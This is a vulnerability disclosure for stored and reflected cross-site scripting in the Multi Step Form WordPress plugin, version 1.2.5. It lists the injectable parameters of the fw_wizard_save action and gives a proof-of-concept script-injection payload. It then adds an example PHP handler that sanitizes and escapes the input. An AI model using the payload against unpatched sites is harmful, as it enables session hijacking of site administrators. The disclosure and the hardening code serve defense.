Exploit Author: Mohammed Ansari (ansaert@gmail.com)
LinkedIn: https://www.linkedin.com/in/ansaert/
Discovered Date: July 27 2018
Affected Version: 1.2.5
Fixed Version: 1.2.8 Released on Aug 3 2018.
Active installations: 7,000+
Plugin: https://wordpress.org/plugins/multi-step-form/
Description
Multi Step Form has a drag & drop enabled form builder for quick and intuitive creation of nice-looking multi step forms. Forms can be embedded on any page or post with short codes.
Classification
Type: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE: CWE-79
Proof of Concept
There are multiple stored and reflected XSS vulnerabilities in the file class-mondula-multistep-forms-admin.php, in the fw_wizard_save action. The cause is unsanitized user input from the following parameters:
data[wizard][steps][0][title]
data[wizard][steps][0][headline]
data[wizard][steps][0][copy_text]
data[wizard][steps][0][parts][0][title]
data[wizard][steps][0][parts][0][blocks][0][label]
data[wizard][steps][0][parts][0][blocks][0][format]
data[wizard][steps][0][parts][0][blocks][1][label]
data[wizard][steps][0][parts][0][blocks][2][label]
data[wizard][steps][0][parts][0][blocks][3][label]
data[wizard][settings][thankyou]
Example:
Open the Multi Step Form editor, enter the payload in one of the fields listed above, and Save. The values are sent via Ajax to http://localhost/word496/wp-admin/admin-ajax.php, for example (URL-encoded):
data%5Bwizard%5D%5Btitle%5D=My+Multi+Step+Form%22%3E%3Cscript%3Ealert(22)%3B%3C%2Fscript%3E
which decodes to data[wizard][title]=My Multi Step Form"><script>alert(22);</script>
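A defensive counterpart to the vulnerable save path, added here as an example and not code from the Multi Step Form plugin: the nested data[wizard] array is sanitized recursively before it is stored, the request is gated by a capability and nonce check, and values are escaped again at render time. The capability name, nonce name, option name and all msf_example_* function names are assumptions; the hook name follows WordPress's wp_ajax_{action} convention for the fw_wizard_save action named above.

```php
<?php
// Added example (not the plugin's code). Recursively sanitize the nested
// data[wizard] array: keys are reduced to a safe character set, plain-text
// fields lose all tags, and the two rich-text fields keep only the limited
// HTML that wp_kses_post() allows (no <script>, no event handlers).
function msf_example_sanitize_wizard( $value, $key = '' ) {
    if ( is_array( $value ) ) {
        $clean = array();
        foreach ( $value as $k => $v ) {
            $k = preg_replace( '/[^A-Za-z0-9_\-]/', '', (string) $k );
            $clean[ $k ] = msf_example_sanitize_wizard( $v, $k );
        }
        return $clean;
    }
    if ( 'copy_text' === $key || 'thankyou' === $key ) {
        return wp_kses_post( (string) $value );     // limited safe HTML
    }
    return sanitize_text_field( (string) $value );  // strips tags entirely
}

// Hardened save handler for the fw_wizard_save Ajax action.
function msf_example_save_handler() {
    // Only privileged users, and only with a valid nonce (anti-CSRF).
    if ( ! current_user_can( 'manage_options' ) ) {  // capability: assumption
        wp_send_json_error( 'forbidden', 403 );
    }
    check_ajax_referer( 'msf_example_nonce', 'nonce' );  // nonce: assumption

    $data   = isset( $_POST['data'] ) ? wp_unslash( $_POST['data'] ) : array();
    $wizard = isset( $data['wizard'] ) && is_array( $data['wizard'] )
        ? $data['wizard'] : array();

    $clean = msf_example_sanitize_wizard( $wizard );
    update_option( 'msf_example_wizard', $clean );  // option name: assumption
    wp_send_json_success();
}
add_action( 'wp_ajax_fw_wizard_save', 'msf_example_save_handler' );

// Output side: escape at render time too, so a value that reached the
// database by another path (import, older version) still cannot execute.
function msf_example_render_title( array $wizard ) {
    $title = isset( $wizard['title'] ) ? $wizard['title'] : '';
    return '<h2>' . esc_html( $title ) . '</h2>';
}
```

With this in place the PoC value `My Multi Step Form"><script>alert(22);</script>` is stored with the script element stripped, and whatever remains is entity-encoded by esc_html() when rendered.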